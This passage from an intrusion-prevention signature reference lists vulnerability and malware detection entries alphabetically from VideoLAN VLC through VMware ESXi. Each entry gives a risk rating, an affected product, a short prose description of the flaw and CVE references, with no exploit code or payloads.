Description: There is a memory corruption vulnerability in VideoLAN VLC Media Player. The flaw is due to insufficient data validation when processing XSPF playlist files. An attacker may entice the target user to open a crafted XSPF file to exploit this vulnerability. Successful attack may allow arbitrary code injection and execution with privileges of the currently logged on user.
Situation: HTTP_SS-VideoLAN-VLC-XSPF-Memory-Corruption
File-TextId_VideoLAN-VLC-XSPF-Memory-Corruption
References:
CVE-2008-4558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4558
BID-31758
http://www.securityfocus.com/bid/31758
Back to top

VideoLAN-VLV-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC
Risk: Moderate
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Integer Overflow
Description: There exists a vulnerability in VideoLAN VLC Media Player.
Situation: HTTP_SS-VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
File-Binary_VideoLAN-VLC-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
References:
CVE-2008-5276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5276
BID-32545
http://www.securityfocus.com/bid/32545
OSVDB-50333
http://www.osvdb.org/50333
Back to top

Vim-Modelines-Remote-Command-Execution

About this vulnerability: A Vim Modelines Remote Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Vim
Type: Input Validation
Description: A vulnerability in Vim, versions before 8.0.0056, which allows remote attackers to execute arbitrary commands due to the lack of input validation.
Situation: File-Text_Vim-Modelines-Remote-Command-Execution
References:
CVE-2016-1248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248
Back to top

Vim-Retab-Integer-Overflow

About this vulnerability: A vulnerability in the Vim retab command.
Risk: High
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Platform: Linux; Unix
Software: Vim
Type: Integer Overflow
Description: A vulnerability in the Vim retab command, Vim versions prior to 8.2.4359, which allows remote attackers to execute by enticing a victim to open a crafted file, due to missing validation when incrementing a buffer index.
Situation: File-Text_Vim-Retab-Integer-Overflow
References:
CVE-2022-0572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0572
Back to top

Vinchin-Backup-And-Recovery-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in Vinchin Backup & Recovery detected
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Linux; Unix
Software: Vinchin Backup And Recovery
Type: Input Validation
Description: A vulnerability in Vinchin Backup & Recovery, versions before 7.2, which allows remote attackers to execute arbitrary code via the checkIpExists API endpoint due to insufficient input validation.
Situation: HTTP_CRL-Vinchin-Backup-And-Recovery-Command-Injection
References:
CVE-2023-45498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45498
Back to top

Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in VIPA Controls WinPLC7
Risk: Moderate
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VIPA Controls WinPLC7
Type: Input Validation
Description: A stack-based buffer overflow exists in VIPA Controls WinPLC7. The vulnerability is due to improper validation of a length field within received TCP packet data before copying the contents to a stack-based buffer. A remote attacker could exploit this vulnerability by sending maliciously crafted TPKT payloads via TCP to the vulnerable application. Successful exploitation could result in denial of service conditions or, in the worst case, arbitrary code execution in the context of the user running the application.
Situation: Generic_CS-Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow
References:
CVE-2017-5177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5177
Back to top

ViperSoftX-C2-Traffic

About this vulnerability: ViperSoftX command and control traffic
Risk: High
First detected in: sgpkg-ips-1754-5242
Last changed: sgpkg-ips-1844-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ViperSoftX is a remote access trojan with information exfiltration capabilities.
Situation: File-Text_ViperSoftX-Script-Content
HTTP_CSH-ViperSoftX-C2-Traffic
Back to top

Virut-Malware-C2-Traffic

About this vulnerability: Virut malware C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Virut is a malicious botnet coupled with a component that infects executable files on Windows computer (and file shares). In addition, Virut is a malware dropper and has been observed to download several malicious executables, such as spam bots. Furthermore, Virut may download any other arbitrary malicious executable at any time and imposes a high security risk. Virut bots organize in a centralized botnet.
Situation: Generic_SS-Virut-Malware-C2-Traffic
Generic_CS-Virut-Malware-C2-Traffic
File-Text_Virut-Malware-C2-Traffic
Back to top

Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection

About this vulnerability: A vulnerability in VISAM VBASE Automation Base
Risk: Moderate
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Platform: Generic
Software: VISAM VBASE
Type: Input Validation
Description: An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing the GestureConfigurations.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.
Situation: File-TextId_Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection
References:
CVE-2022-46300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46300
Back to top

Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection

About this vulnerability: A vulnerability in VISAM VBASE Automation Base
Risk: Moderate
First detected in: sgpkg-ips-1631-5242
Last changed: sgpkg-ips-1631-5242
Platform: Generic
Software: VISAM VBASE
Type: Input Validation
Description: An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing the LayerSettings.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.
Situation: File-TextId_Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection
References:
CVE-2022-45468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45468
Back to top

Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection

About this vulnerability: A vulnerability in VISAM VBASE Automation Base
Risk: Moderate
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: VISAM VBASE
Type: Input Validation
Description: An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing the ProjektInfo.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.
Situation: File-TextId_Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection
References:
CVE-2022-45876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45876
Back to top

Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection

About this vulnerability: A vulnerability in VISAM VBASE Automation Base
Risk: Moderate
First detected in: sgpkg-ips-1622-5242
Last changed: sgpkg-ips-1622-5242
Platform: Generic
Software: VISAM VBASE
Type: Input Validation
Description: An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing WebRemote.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.
Situation: File-TextId_Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection
References:
CVE-2022-46286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46286
Back to top

Viscom-Software-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow

About this vulnerability: A vulnerability in Viscom Software Image Viewer CP Gold ActiveX Control
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Viscom Image Viewer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Viscom Software Image Viewer ActiveX Control. The vulnerability is due to a boundary error when handling the function call TIFMergeMultiFiles() with an overly long parameter. A remote attacker can leverage this vulnerability by enticing a target user to open a crafted HTML page. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: File-Text_Viscom-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow
Back to top

Visual-Basic-Script-ShellCode-Generation

About this vulnerability: Suspicious Visual Basic Script code
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Visual Basic Script is a powerful programming language that is embedded into Microsoft Internet Explorer. It can be used to generate and hide shellcode that is used in exploits against the browser.
Situation: HTTP_SS-Visual-Basic-Script-ShellCode-Generation
File-Text_Visual-Basic-Script-ShellCode-Generation
Back to top

Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Visual IRC
Risk: Moderate
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Visual IRC
Type: Buffer Overflow
Description: Visual IRC has a stack-based buffer overflow vulnerability in the handling of overly long responses to the JOIN command. A successful exploit leads to a denial of service terminating the affected service or arbitrary code execution with the privileges of the currently logged in user.
Situation: Generic_Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow
References:
CVE-2007-3612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3612
BID-24798
http://www.securityfocus.com/bid/24798
OSVDB-37888
http://www.osvdb.org/37888
Back to top

Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Visual Mining NetCharts Server
Risk: Moderate
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Visual Mining NetCharts
Type: Input Validation
Description: An arbitrary file upload vulnerability has been reported in Visual Mining NetCharts Server. The vulnerability exists in the Admin console and is due to insufficient validation of filename during the upload process. A remote attacker can exploit this vulnerability to execute arbitrary code on the affected system by uploading arbitrary files to certain locations. The remote attacker must be authenticated prior to exploiting the vulnerability, however default credentials can be used in order to by-pass the authentication.
Situation: HTTP_CS-Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload
References:
CVE-2014-8516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8516
OSVDB-114127
http://www.osvdb.org/114127
Back to top

Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Visual Mining NetCharts Server
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Visual Mining NetCharts
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Visual Mining NetCharts Server. The vulnerability is due to insufficient validation of file paths during the upload process. A remote attacker can exploit this vulnerability to execute arbitrary code on the affected system by uploading arbitrary files to certain locations.
Situation: HTTP_CS-Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal
Back to top

Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service

About this vulnerability: A vulnerability in Visual Mining NetCharts Server
Risk: Moderate
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Visual Mining NetCharts Server
Type: Directory Traversal
Description: A denial of service condition vulnerability has been reported in Visual Mining NetCharts Server projectContents.jsp page. The vulnerability is due to arbitrary directory traversal when renaming a file. A remote attacker can exploit this vulnerability by sending a crafted HTTP request to rename important files. Successful exploitation would create a denial of service condition.
Situation: HTTP_CRL-Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service
References:
CVE-2015-4032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4032
OSVDB-122480
http://www.osvdb.org/122480
Back to top

Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal

About this vulnerability: A vulnerability in Visual Mining NetCharts Server
Risk: High
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Visual Mining NetCharts Server
Type: Directory Traversal
Description: An arbitrary file upload vulnerability has been reported in Visual Mining NetCharts Server. The vulnerability is due to lack of sanitization on a remotely supplied parameter within the saveFile.jsp page. A remote attacker can exploit this vulnerability to execute arbitrary code with SYSTEM privileges on the affected system by uploading arbitrary files to certain locations.
Situation: HTTP_CRL-Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal
References:
CVE-2015-4031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4031
Back to top

Vjw0rm-Malware-Infection-Traffic

About this vulnerability: Vjw0rm Malware infection traffic
Risk: High
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Vjw0rm malware infection traffic was detected.
Situation: HTTP_CS-Vjw0rm-Malware-Infection-Traffic
Back to top

VLC-Httpd-Connection-Header-Format-String-RCE

About this vulnerability: A vulnerability in VLC
Risk: High
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: VideoLAN VLC
Type: Input Validation
Description: There exists a vulnerability in VLC, versions before 0.8.6e, which allows remote attackers to execute arbitrary code due to insufficient validation of the Connection header.
Situation: HTTP_CRH-VLC-Httpd-Connection-Header-Format-String-RCE
Back to top

VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow

About this vulnerability: A vulnerability in libmodplug project libmodplug
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: A remote code execution vulnerability has been reported in the libmodplug library used by VLC Media Player. The vulnerability is due to an error while parsing Instruction fields in ABC files with the style sheet directive "MIDI drum" or "MIDI gchord", which can result in a heap buffer overflow condition. Remote attackers could exploit this vulnerability by enticing the target user to view a malicious ABC file. A successful attack based on this vulnerability may result in the execution of arbitrary code within the security context of the currently logged-in user.
Situation: File-Text_VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow
References:
OSVDB-96133
http://www.osvdb.org/96133
Back to top

VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow

About this vulnerability: A vulnerability in libmodplug project libmodplug
Risk: Moderate
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Integer Overflow
Description: A remote code execution vulnerability has been reported in the libmodplug library used by VLC Media Player. The vulnerability is due to an error while parsing Parts field in ABC files which can result in an integer overflow. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a malicious file with a vulnerable version of the application.
Situation: File-Text_VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow
References:
OSVDB-96133
http://www.osvdb.org/96133
Back to top

VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC Media Player
Risk: Moderate
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: There is a stack buffer overflow in VLC Media Player. The vulnerability is due to lack of bounds checking while copying a hostname into a stack buffer in the MMS access plugin. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted URL with a vulnerable version of VLC Media Player. Successful exploitation may allow the attacker to execute arbitrary code on the target user's machine with the privileges of the VLC Media Player process.
Situation: File-TextId_VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow
References:
CVE-2012-1775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1775
OSVDB-80188
http://www.osvdb.org/80188
Back to top

VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in VideoLAN VLC media player
Risk: High
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in VideoLAN VLC media player. A remote attacker can exploit this vulnerability by persuading a user to open a malicious MP4 with a vulnerable version of VideoLAN VLC media player. Successful exploitation could allow the attacker to execute arbitrary code.
Situation: Shared_SS-VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
File-MPEG_VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
References:
CVE-2008-1489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1489
BID-28433
http://www.securityfocus.com/bid/28433
OSVDB-43702
http://www.osvdb.org/43702
Back to top

VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow

About this vulnerability: A VLC Media Player ParseJSS Heap Buffer Overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-935-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: A buffer overflow vulnerability in VideoLAN VLC Media Player, versions prior to 2.2.5.1, which allows remote attackers to execute remote code by crafting a malicious subtitle file.
Situation: File-Text_VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow
References:
CVE-2017-8311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8311
Back to top

VLC-Media-Player-Plugins-Format-String-Vulnerabilities

About this vulnerability: A vulnerability in VLC Media Player
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Malfunction
Description: There are multiple format string vulnerabilities in plugins in VideoLAN VLC Media Player that allow remote attackers to cause a denial of service or execute arbitrary code via format string specifiers in an Ogg/Vorbis file, an Ogg/Theora file, a CDDB entry for a CD Digital Audio (CDDA) file, or Service Announce Protocol (SAP) multicast packets.
Situation: File-Binary_VLC-Media-Player-Plugins-Format-String-Vulnerabilities
References:
CVE-2007-3316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3316
BID-24555
http://www.securityfocus.com/bid/24555
OSVDB-37382
http://www.osvdb.org/37382
OSVDB-37381
http://www.osvdb.org/37381
OSVDB-37380
http://www.osvdb.org/37380
OSVDB-37379
http://www.osvdb.org/37379
Back to top

VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Live555 liblivemedia
Risk: Low
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: A stack buffer overflow exists in VideoLAN VLC Media Player. The vulnerability is due an error in VLC's embedded Live555 RTSP library, when handling RTSP requests. Incorrect handling of RTSP commands can result in a stack buffer overflow. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to connect to a malicious RTSP media stream or by opening a malicious playlist file. Successful exploitation could result in arbitrary code execution in the context of the application.
Situation: Generic_SS-VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow
References:
CVE-2013-6933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6933
Back to top

VM2-Sandbox-Protection-Bypass-CVE-2022-36067

About this vulnerability: An attempt to exploit a vulnerability in VM2 detected
Risk: High
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Platform: Generic
Software: VM2
Type: Input Validation
Description: VM2 is a sandbox that can run untrusted JavaScript code. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11.
Situation: File-Text_VM2-Sandbox-Protection-Bypass-CVE-2022-36067
References:
CVE-2022-36067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36067
Back to top

VM2-Sandbox-Protection-Bypass-CVE-2023-29017

About this vulnerability: An attempt to exploit a vulnerability in VM2 detected
Risk: High
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Platform: Generic
Software: VM2
Type: Input Validation
Description: VM22 is a JavaScript sandbox that can run untrusted code with whitelisted NodeJS built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host.
Situation: File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-29017
References:
CVE-2023-29017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29017
Back to top

VM2-Sandbox-Protection-Bypass-CVE-2023-30547

About this vulnerability: An attempt to exploit a vulnerability in VM2 detected
Risk: High
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: VM2
Type: Input Validation
Description: There exists a vulnerability in exception sanitization of VM2 for versions up to 3.9.16. It allows attackers to raise an unsanitized host exception inside "handleException()" which can be used to escape the sandbox and run arbitrary code in host context.
Situation: File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-30547
References:
CVE-2023-30547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30547
Back to top

VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199

About this vulnerability: An attempt to exploit a vulnerability in VM2 detected
Risk: High
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Platform: Generic
Software: VM2
Type: Input Validation
Description: There exists a vulnerability in the source code transformer (exception sanitization logic) of VM2 for versions up to 3.9.15. It allows attackers to bypass "handleException()" checks and leak unsanitized host exceptions, which can be used to escape the sandbox and run arbitrary code in host context.
Situation: File-Text_VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199
References:
CVE-2023-29199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29199
Back to top

VMTurbo-Operations-Manager-Remote-Command-Execution

About this vulnerability: A VMTurbo Operations Manager Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VMTurbo Operations Manager
Type: Input Validation
Description: A vulnerability in VMTurbo Operations Manager, versions before 4.6 build 28657, which allows remote attackers to execute arbitrary commands with shell metacharacters in a DOWN call via the fileDate parameter.
Situation: HTTP_CRL_VMTurbo-Operations-Manager-Remote-Command-Execution
References:
CVE-2014-5073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5073
BID-69225
http://www.securityfocus.com/bid/69225
OSVDB-109572
http://www.osvdb.org/109572
Back to top

VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864

About this vulnerability: A vulnerability in VMWare Aria Operations for Logs
Risk: High
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: VMware Aria Operations for Logs; VMware Cloud Foundation
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in VMware Aria Operations for Logs. The vulnerability is due to improper validation of user data in the InternalClusterController class. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of the root user.
Situation: File-Binary_VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864
References:
CVE-2023-20864
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20864
Back to top

VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887

About this vulnerability: An attempt to exploit a vulnerability in VMware Aria Operations for Networks detected
Risk: High
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1602-5242
Platform: Generic
Software: VMware Aria Operations for Networks
Type: Insecure Configuration
Description: This vulnerability allows remote attackers to execute arbitrary code on affected installations of VMware Aria Operations for Networks. Authentication is not required to exploit this vulnerability. The specific flaw exists within the "createSupportBundle" method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.
Situation: HTTP_CRL-VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887
References:
CVE-2023-20887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20887
Back to top

VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection

About this vulnerability: A vulnerability in VMWare Aria Operations for Networks
Risk: Moderate
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Platform: Generic
Software: VMware Aria Operations for Networks
Type: Input Validation
Description: Missing input validation for JavaScript code in exportPDF method causes a code injection vulnerability in VMware Aria. A successful exploit allows an attacker to gain access to information on the target system.
Situation: HTTP_CS-VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection
References:
CVE-2023-20889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20889
Back to top

VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in VMWare Aria Operations for Networks
Risk: Moderate
First detected in: sgpkg-ips-1699-5242
Last changed: sgpkg-ips-1699-5242
Platform: Generic
Software: VMware Aria Operations for Networks
Type: Input Validation
Description: Improper validation of user input used in the login banner causes a cross-site scripting vulnerability in VMWare Aria Operations for Networks. A successful exploitation allows an attacker to execute arbitrary scripts on a user's browser.
Situation: HTTP_CRL-VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting
References:
CVE-2024-22241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22241
Back to top

VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal

About this vulnerability: A vulnerability in VMware Aria Operations for Networks
Risk: High
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Platform: Generic
Software: VMware Aria Operations for Networks
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in VMware Aria Operations for Networks. The vulnerability is due to improper validation of file names in user requests when uploading device configuration files. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target appliance. Successful exploitation could result in arbitrary code execution under the security context of the root user.
Situation: HTTP_CS-VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal
References:
CVE-2023-20890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20890
Back to top

VMware-Authorization-Service-User-Credential-Parsing-DOS

About this vulnerability: VMware Authorization Service User Credential Parsing Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMware Player; EMC VMware Workstation
Type: Malfunction
Description: A denial of service vulnerability has been reported in the authorization service of some VMware products. The flaw is due to a design error when processing login requests. An attacker can exploit this vulnerability by supplying malicious USER or PASS strings to the target host. Successful exploitation would result on the termination of the "vmware-authd" process causing a denial of service condition.
Situation: Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS
Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS-2
References:
BID-36630
http://www.securityfocus.com/bid/36630
Back to top

VMware-Cloud-Director-Remote-Code-Execution

About this vulnerability: A vulnerability in VMware Cloud Director
Risk: High
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: VMware Cloud Foundation
Type: Input Validation
Description: There exists a vulnerability in VMware Cloud Director, versions 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, 9.1.0.x before 9.1.0.4, which allows remote attackers to execute arbitrary code due to the insufficient input validation to root:Host.
Situation: HTTP_CS-VMware-Cloud-Director-Remote-Code-Execution
References:
CVE-2020-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3956
Back to top

VMware-Com-API-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in VMware VMware COM API ActiveX control
Risk: High
First detected in: sgpkg-ips-165-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EMC VMware ESX Server; EMC VMware GSX Server
Type: Malfunction
Description: There is a buffer overflow vulnerability in the VMware COM API ActiveX control. The vulnerability is due to improper error handling when processing arguments passed to the GuestInfo() method of an ActiveX Control. A remote attacker can exploit the vulnerability by enticing the target user to visit a malicious web page. A successful exploitation may allow for arbitrary code injection and execution.
Situation: HTTP_SS-VMware-Com-API-ActiveX-Control-Buffer-Overflow
File-Text_VMware-Com-API-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-3892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3892
BID-30934
http://www.securityfocus.com/bid/30934
Back to top

VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in VMWare ESX
Risk: High
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EMC VMware ESX Server; EMC VMware ESXi Server
Type: Input Validation
Description: A denial of service vulnerability exists in VMware ESX and ESXi server. The vulnerability is due to improper handling of certain SOAP requests in the vSphere API. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to the affected server. Successful exploitation would result in a denial of service condition.
Situation: HTTP_CS-VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service
References:
CVE-2012-5703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5703
BID-56571
http://www.securityfocus.com/bid/56571
OSVDB-87539
http://www.osvdb.org/87539
Back to top

VMware-ESXi-Authentication-Bypass-CVE-2024-37085

About this vulnerability: An attempt to exploit a vulnerability in EMC VMware ESXi Server detected
Risk: High
First detected in: sgpkg-ips-1767-5242
Last changed: sgpkg-ips-1767-5242
Platform: Windows
Software: EMC VMware ESXi Server
Type: Input Validation
Description: VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.
Situation: SMB-TCP_VMware-ESXi-Authentication-Bypass-CVE-2024-37085
References:
CVE-2024-37085
